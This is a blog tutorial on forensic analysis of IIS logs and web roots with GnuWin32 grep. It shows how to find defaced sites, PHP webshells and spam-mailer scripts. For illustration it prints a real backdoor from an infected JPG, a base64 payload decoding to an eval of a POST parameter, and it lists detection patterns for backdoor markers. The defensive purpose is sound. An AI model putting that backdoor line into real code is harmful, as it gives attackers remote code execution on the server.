Grep for forensic log parsing and analysis on Windows Server IIS

How to use GnuWin32 ported tools like grep.exe and find.exe for forensic log file analysis in Windows Server.
Published on Tuesday, 9 April 2013

In this article I'll give some real-life examples of using ported GnuWin tools like grep.exe for logfile analysis on Windows servers. The article provides three examples, as an alternative to LogParser, because finding spam scripts fast is often very important.


Forensic log parsing & analysis with grep

Find webshells and backdoors in websites, and easily check visitors' IP addresses or hits to backdoor/webshell files in IIS log files. This is command-line log analysis on Windows Server: search for Joomla, WordPress, Drupal and PHP malware and backdoors in your website with grep and find.

Recently Brad Kingsley wrote an excellent article titled "Using LogParser to Check Visitor IPs to a Certain Page".

Even though LogParser is a great tool for the job, I replied to that post that I'd rather use ported GnuWin tools, such as grep.exe, cut.exe, find.exe or - depending on the job - tail.exe for such easy tasks. Just because my fingers type grep.exe and cut.exe commands faster than SQL 🙂

Being able to find information fast on – for example – website abuse is very important for my abuse-desk job. Under certain circumstances using these tools simplifies your job, simply because you can't use recursion with LogParser (yes, you can use folder*.log, but not folde*\file.log). See below for an update.

  • example 1: Grep.exe Joomla x.htm
  • example 2: Grep for Joomla, WordPress, and Drupal backdoors
  • example 3: Spam mail sent from web server – web site

For the uninitiated, grep.exe is basically a command to find a string in a file or standard input. The result is printed to standard output and can also be piped into a file or second command. It supports counting of results, regular expressions (regex), extended regex, Perl regex, case insensitive, and so on.

With grep, you can also search recursively through many files, and while doing so include only files whose names match a pattern. Quite handy :).

I use "grep.exe" and "grep" interchangeably in this article; they are one and the same.

Just type grep.exe --help for a listing.
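
As a quick illustration of the options mentioned above, here is a minimal sketch that builds a tiny sample log and runs grep against it. The log lines and IP addresses are made up for this example, and the commands assume a Unix-like shell with GNU grep; on Windows the same options apply to grep.exe.

```shell
#!/bin/sh
# Build a small, made-up sample log in a temporary directory.
demo=$(mktemp -d)
cat > "$demo/sample.log" <<'EOF'
10.0.0.1 - - [09/Apr/2013:08:47:58 +0200] "GET /x.htm HTTP/1.1" 200 3709
10.0.0.2 - - [09/Apr/2013:08:48:01 +0200] "GET /index.htm HTTP/1.1" 200 512
10.0.0.3 - - [09/Apr/2013:08:49:10 +0200] "POST /Login.php HTTP/1.1" 302 0
EOF

# -c counts matching lines instead of printing them.
count=$(grep -c "/x.htm" "$demo/sample.log")
echo "lines with /x.htm: $count"

# -i ignores case, so "login.php" also matches "Login.php".
nocase=$(grep -ci "login.php" "$demo/sample.log")
echo "case-insensitive hits: $nocase"

# -E enables extended regex; the output is piped into a second command.
posts_or_x=$(grep -E "(POST|/x\.htm)" "$demo/sample.log" | wc -l)
echo "POST or /x.htm lines: $((posts_or_x))"
```

The leading slash in "/x.htm" is what keeps the request for /index.htm out of the first count.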

About LogParser

Log parser is a powerful, versatile tool that provides universal query access to text-based data such as log files, XML files and CSV files, as well as key data sources on the Windows operating system such as the Event Log, the Registry, the file system, and Active Directory.

About GnuWin

GnuWin provides ports of tools with a GNU or similar open source license, to modern MS-Windows (Microsoft Windows 2000 / XP / 2003 / Vista / 2008 / 7)

I'm sure you're able to download and install these tools, so that is not covered in this post. For easy usage, place the files in a directory that is listed in your PATH environment variable.

Grep.exe Joomla x.htm – example 1

Recent Joomla com_jce attacks and defaces left behind a distinct file called x.htm. Since an already hacked site always leads to more abuse, it's important to find these defaced Joomla websites.

Suppose I want to search hundreds of logfiles on one web server for the string x.htm. To prevent false positives as much as possible, we need to exclude index.htm and index.html as matches, which is why the search string includes the leading slash: /x.htm. I want grep.exe to produce only a listing of log files with matches, not to output every matching line.

To accomplish this we provide a list parameter.

c:\inetpub\logs>c:\bin\grep.exe -rl --include=nc1304.log "/x.htm" *

In this command we use -r for recursive, -l to list only the names of files with matches, and --include to search only through files whose names match the given pattern.

The result may be:

W3SVC001/nc1304.log
W3SVC002/nc1304.log
W3SVC095/nc1304.log
W3SVC586/nc1304.log
...
...

If we execute the same command without -l, the matching lines are printed to the screen:

W3SVC002/nc1304.log:a.bb.cc.ddd - - [09/Apr/2013:08:47:58 +0200]
 "GET /x.htm HTTP/1.1" 200 3709
W3SVC095/nc1304.log:a.bb.cc.ddd - - [09/Apr/2013:20:09:04 +0200]
 "GET /x.htm HTTP/1.1" 404 1830
W3SVC095/nc1304.log:a.bb.cc.ddd - - [09/Apr/2013:20:09:04 +0200]
 "GET /moblog/x.htm HTTP/1.1" 404 1795
W3SVC586/nc1304.log:aa.bbb.c.dd - - [09/Apr/2013:21:07:45 +0200]
 "GET /x.htm HTTP/1.1" 404 1795
W3SVC586/nc1304.log:aa.bbb.c.dd - - [09/Apr/2013:21:07:46 +0200]
 "GET /x.htm HTTP/1.1" 404 1795
W3SVC586/nc1304.log:aa.bbb.c.dd - - [09/Apr/2013:21:07:46 +0200]
 "GET /images/x.htm HTTP/1.1" 200 3709
W3SVC586/nc1304.log:dd.aaa.b.c - - [09/Apr/2013:21:10:29 +0200]
 "GET /x.htm HTTP/1.1" 404 1795
W3SVC586/nc1304.log:dd.aaa.b.c - - [09/Apr/2013:21:10:29 +0200]
 "GET /images/x.htm HTTP/1.1" 200 3709
...
...

For more on NCSA Common Log File Format, see the IIS 6.0 documentation.

In this view, we see that the websites with IIS identifiers 002 and 586 are probably hacked, since they return a 200 OK HTTP status code. Website ID 095 returns 404 Not Found as result, which is good. Other logfile formats, such as W3C Extended (IISW3C) have different fields and results (all on one line):

W3SVC762/u_ex1304.log:2013-04-12 16:23:47 xx.xx.xxx.xx GET /wordpress/x.htm - 80 - a.bb.cc.dd Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_7_1)+AppleWebKit/535.1+(KHTML,+like+Gecko)+Safari/535.1 - www.example.com 200 0 0 21849 178 904

Even though the HTTP return code is 200, this is still a false positive because of WordPress' behavior.
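
To narrow the output down to requests that actually succeeded, the status code can be made part of the pattern. The following is a minimal sketch for the NCSA format only, assuming a Unix-like shell with GNU grep. The site directories W3SVC901 and W3SVC902 and the IP addresses are hypothetical sample data.

```shell
#!/bin/sh
# Two made-up site log directories with NCSA-format lines.
logs=$(mktemp -d)
mkdir "$logs/W3SVC901" "$logs/W3SVC902"
cat > "$logs/W3SVC901/nc1304.log" <<'EOF'
10.0.0.1 - - [09/Apr/2013:21:07:45 +0200] "GET /x.htm HTTP/1.1" 404 1795
10.0.0.1 - - [09/Apr/2013:21:07:46 +0200] "GET /images/x.htm HTTP/1.1" 200 3709
EOF
cat > "$logs/W3SVC902/nc1304.log" <<'EOF'
10.0.0.2 - - [09/Apr/2013:20:09:04 +0200] "GET /x.htm HTTP/1.1" 404 1830
EOF

# Match only requests for x.htm that were answered with status 200.
# [^ ]* allows any path prefix in front of /x.htm.
pattern='"GET [^ ]*/x\.htm HTTP/1\.[01]" 200 '

# -l lists only the log files that contain such a request.
hacked=$(cd "$logs" && grep -rlE --include=nc1304.log "$pattern" .)
echo "$hacked"
```

Only the first site is listed, because the second one answered with 404. As the WordPress example shows, a 200 is still only a hint and each hit needs a manual check.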

Grep for Joomla, WordPress, and Drupal backdoors – example 2

Backdoors come in a wide variety. In example 3 you see a .PHP-file with a random name, for mass mailing purposes. We find these all the time within hacked Joomla, WordPress and Drupal web sites. Not only mass mailing files, but also PHP backdoor shells (C99 shell, FilesMan shell, etc.). These backdoor shells give crackers constant access to the website.

We often also find modified files with iframes and/or viruses, or newly uploaded files. Even images like .gif and .jpg are modified to contain backdoors! Sucuri wrote a blog post about malware hiding inside JPG EXIF headers, something I've been seeing for the past few weeks.

We can locate roughly 99.9% of all infected files, and files modified with backdoors, with a single grep.exe command:

c:\inetpub\wwwroot>c:\bin\grep.exe -Er "(gzinfl|base64_d)" *

The -E option enables grep.exe's extended regular expression capabilities, and -r searches recursively into directories. The pattern matches everything containing "gzinfl" or "base64_d". You've probably guessed these stand for gzinflate() and base64_decode(). We can extend the search with strings like eval, iframe, and so on, but we don't want too many false positives in our result list.

Our result list might be:

Binary file administrator/components/com_hsconfig/presets/overlay/closebutton.jpg matches
Binary file administrator/components/com_hsconfig/presets/slideshow/gallery-in-box.jpg matches
Binary file images/carwash2.jpg matches
Binary file images/fader0.jpg matches
Binary file images/sn_2.jpg matches
Binary file images/stories/Flyer_achterkant.jpg matches
Binary file images/stories/fruit/pears.jpg matches
Binary file images/stories/thema_tanken_v2.jpg matches
Binary file images/stories/web_links.jpg matches
Binary file images/united3.jpg matches
Binary file modules/mod_rokajaxsearch/images/youtube.jpg matches

Sometimes you find the JPG files Sucuri writes about. Such a file might contain:

/.*/e
 eval(
   base64_decode('
     aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30=
   ')
 );

Which decodes (translates) to:

$ echo aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30= | base64 -d
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

Yup, we found a backdoor in a .JPG file.
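
Since image files should never contain PHP function names, the search can also be restricted to images only. This is a sketch under assumptions: a Unix-like shell with GNU grep, and a made-up web root whose file names (clean.jpg, bad.jpg) are purely illustrative.

```shell
#!/bin/sh
# Made-up web root: a clean "image", an "image" with an injected payload,
# and a regular PHP file that legitimately calls base64_decode().
site=$(mktemp -d)
mkdir -p "$site/images"
printf 'plain image data\n' > "$site/images/clean.jpg"
printf 'Exif /.*/e eval(base64_decode("aWYg"));\n' > "$site/images/bad.jpg"
printf '<?php echo base64_decode($x); ?>\n' > "$site/index.php"

# --include limits the recursive search to files matching the glob,
# -l prints only file names, -E enables the alternation.
suspect=$(cd "$site" && grep -rlE --include="*.jpg" --include="*.gif" \
    "(gzinfl|base64_d)" .)
echo "$suspect"
```

Here index.php is skipped because of --include, so only the image carrying the payload is reported.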

More grep search commands

Other grep search commands that often work well are:

c:\bin\grep.exe -Erl "eval\((gzinfl|base64_d)" .

Extended regular expression that searches for eval(gzinflate or eval(base64_decode and lists the matching files.

c:\bin\grep.exe -Erl "(gzinfl|base64_d)" .

Extended regular expression that searches for gzinflate or base64_decode without eval, and lists the matching files.

c:\bin\grep.exe -Er "eval\((\$_GET|\$_POST|\$_REQUEST)" .

This extended regular expression searches for eval($_GET or eval($_POST or eval($_REQUEST in files. This one can be simplified into:

c:\bin\grep.exe -Er "eval\(\$_(GET|POST|REQUEST)" .

Search only for $_GET or $_POST or $_REQUEST in all files with an extended regular expression:

c:\bin\grep.exe -Er "(\$_GET|\$_POST|\$_REQUEST)" .

Simplified:

c:\bin\grep.exe -Er "\$_(GET|POST|REQUEST)" .

Fgrep or grep -F

You've seen a lot of PHP backdoor obfuscation techniques and strings in this post. Instead of using them all separately from the command line, you can combine them into one file for usage with fgrep (or grep -F).

Fgrep is the same as grep -F: it interprets PATTERN as a list of fixed strings, separated by newlines, any of which is to be matched.

For example, create a txt file with the following contents:

eval($_REQUEST
eval($_GET
eval($_POST
$GLOBALS[
strrev('edoced
base64_decode
$f53[
hacked
FilesMan
\x73\x74\x72\x5f

The following command recursively searches all files for these patterns, or strings: fgrep -rf patternFile.txt DIRECTORY > result-file.txt. Now you only have to inspect result-file.txt for signs of PHP backdoors.
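
A runnable sketch of that workflow, using a shortened pattern file and a made-up site directory. The file names index.php and shell.php are hypothetical, and a Unix-like shell with GNU grep is assumed. The -l option is added here so that the result file holds only file names.

```shell
#!/bin/sh
work=$(mktemp -d)
mkdir "$work/site"

# Shortened pattern file: one fixed string per line, no regex escaping needed.
cat > "$work/patternFile.txt" <<'EOF'
eval($_REQUEST
eval($_POST
base64_decode
FilesMan
EOF

# Made-up site content: one clean file and one with a backdoor one-liner.
printf '<?php echo "hello"; ?>\n' > "$work/site/index.php"
printf '<?php eval($_POST["zz1"]); ?>\n' > "$work/site/shell.php"

# -F: fixed strings, -f: read patterns from a file, -r: recurse, -l: names only.
(cd "$work/site" && grep -rlFf ../patternFile.txt .) > "$work/result-file.txt"
cat "$work/result-file.txt"
```

Make sure the pattern file contains no empty line: an empty pattern matches every line of every file.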

Update 2015-01-09

nějakej PHP backdoor and other PHP backdoor variants

The PHP backdoor that I believe is called "nějakej" uses an $f53[] array to store its payload in $GLOBALS. It is easy to rename this to $f54, but I haven't encountered that at the time of this writing (2015-01-09). So add \$f53 to your grep.exe search.

As time passes and "malware" authors evolve (ahem...), they try to use the least obvious functions possible. It is not uncommon to find functions like strrev('lave'); or strrev('edoced_46esab');. These are reversed representations of eval and base64_decode, meant to circumvent (semi-)automatic scans like the ones I described above. Always keep this in mind!
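
One way to keep up with this trick is to generate the reversed names instead of typing them by hand. The sketch below assumes a Unix-like shell with GNU grep and the rev utility, which is not one of the tools named in this article. The helper function reverse and the sample files are hypothetical.

```shell
#!/bin/sh
# Reverse a function name the way the malware does, e.g. eval -> lave.
reverse() { printf '%s\n' "$1" | rev; }

rev_eval=$(reverse eval)
rev_b64=$(reverse base64_decode)
echo "$rev_eval $rev_b64"

# Made-up files: one uses the strrev() trick, one uses strrev() harmlessly.
site=$(mktemp -d)
printf '<?php $f = strrev("edoced_46esab"); ?>\n' > "$site/a.php"
printf '<?php echo strrev("hello"); ?>\n' > "$site/b.php"

# Search for strrev( followed by a quote and one of the reversed names.
hits=$(cd "$site" && grep -rlE "strrev\(['\"]($rev_eval|$rev_b64)" .)
echo "$hits"
```

Only a.php is reported. The harmless strrev("hello") call in b.php does not match, which keeps the false positives down compared to searching for strrev alone.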

PHP Backdoor Obfuscation Techniques

A must-read is Vexatious Tendencies' blog post PHP Backdoor Obfuscation Techniques, for more information about how to obfuscate (or recognize) PHP backdoors.

Brad Duncan, security researcher at Rackspace, wrote an interesting article about evolving JavaScript (malware) obfuscation. Similar obfuscation shows up in the PHP backdoors you often find in web applications like WordPress, Joomla or Drupal. So stay informed on the latest obfuscation techniques.

Spam mail sent from web server – web site – example 3

Sometimes you open up your abuse Inbox and you find a complaint (or notification) containing the following email headers:

Received: from some-webserver.example.net (some-webserver.example.net
 [xx.xx.xxx.xx])
    by some-smtpserver.example.net (Postfix) with SMTP id 84B641B0D2A4
    for <jefff@servicemaster380.com>; Sat, 13 Apr 2013 09:22:19 +0200 (CEST)
Date: Sat, 13 Apr 2013 09:22:19 +0200
Subject: Your Order#681588745
To: jefff@servicemaster380.com
X-PHP-Originating-Script: 0:394c051af.php(6) : eval()'d code(2) :
 eval()'d code(4) : eval()'d code
From: "Airlines" <service-194@dallasconcerttickets.com>
X-Mailer: CF-XPInformer
Reply-To: "Airlines" <service-194@dallasconcerttickets.com>

Luckily PHP adds an X-PHP-Originating-Script header containing the name of the script, in this case 394c051af.php. This makes our search a whole lot easier! 🙂 Of course, we could use find.exe to locate this particular file somewhere on the file system (c:\inetpub\wwwroot>find.exe -type f -name 394c051af.php -print), but that is very time-consuming, not to mention the disk I/O load it causes.

It's a lot faster to use grep.exe to find this string in the HTTP log files. We use almost the same grep command parameters:

c:\inetpub\logs>c:\bin\grep.exe -rl --include=nc1304.log "394c051af.php" *

Chances are there is only one hit, because the filename is unique. If PHP hadn't printed the filename, we would have to make an educated guess based on the timestamp in the e-mail headers in combination with the HTTP POST verb. Something along the lines of the following, for W3C and NCSA logs respectively, each searching a timeframe of one minute (note that IIS normally writes W3C timestamps in UTC, so adjust the hour to your time zone offset):

c:\inetpub\logs>c:\bin\grep.exe -rl --include=ex1304.log "2013-04-13 09:22:.*POST" *
c:\inetpub\logs>c:\bin\grep.exe -rl --include=nc1304.log "13/Apr/2013:09:22:.*POST" *

This'll most likely output multiple logfiles with hits to the query, and all need to be inspected for suspicious behavior.
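
Once a suspicious log file turns up, cut can pull out the client addresses so that repeat visitors stand out. This is a minimal sketch for the NCSA format, where the client IP is the first space-separated field. It assumes a Unix-like shell. The sort and uniq commands are not mentioned above but belong to the same GNU toolset, and the log lines and IP addresses are made up.

```shell
#!/bin/sh
log=$(mktemp)
cat > "$log" <<'EOF'
10.0.0.5 - - [13/Apr/2013:09:22:01 +0200] "POST /394c051af.php HTTP/1.1" 200 12
10.0.0.5 - - [13/Apr/2013:09:22:19 +0200] "POST /394c051af.php HTTP/1.1" 200 12
10.0.0.9 - - [13/Apr/2013:09:22:30 +0200] "GET /index.php HTTP/1.1" 200 4096
10.0.0.7 - - [13/Apr/2013:09:23:02 +0200] "POST /394c051af.php HTTP/1.1" 200 12
EOF

# Keep POST requests within the 09:22 minute, take field 1 (the client IP),
# then count how often each address occurs, most frequent first.
top=$(grep "13/Apr/2013:09:22:.*POST" "$log" | cut -d' ' -f1 \
      | sort | uniq -c | sort -rn)
echo "$top"

# Just the distinct addresses, without counts.
ips=$(grep "13/Apr/2013:09:22:.*POST" "$log" | cut -d' ' -f1 | sort -u)
echo "$ips"
```

For W3C Extended logs the client IP sits in a different column, so the -f value has to follow the #Fields header of the log file in question.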

LogParser, recurse through directories and logfiles

Update 2013-07-17: To recursively scan through directories with LogParser, you can use FOR with DIR /S /B:

FOR /F %i IN ('DIR /S /B u_ex1307.log') DO @LogParser -i:w3c "SELECT COUNT(cs-method) AS nmb_get FROM %i WHERE date = '2013-07-05' AND time = '18:30' AND cs-method = 'GET'"

Finding Security Insights, Patterns, and Anomalies in Big Data

This article, Using grep.exe for forensic log analysis on Windows Server and IIS, is mentioned as a reference in the book Information Security Analytics: Finding Security Insights, Patterns, and Anomalies in Big Data, written by Mark Talabis, Robert S. McPherson, I Miyamoto, and Jason Martin. Thanks! 🙂

Forensic analysis of web server logfiles – the conclusion

In this post I've shown you how to use freely available, open source command-line tools like grep.exe, find.exe, cut.exe, cat.exe and wc.exe to perform some basic forensic analysis of web server log files. This post also gave you some insight into commonly used PHP obfuscation methods that hide PHP malware, webshells and backdoors.

I hope you found this helpful.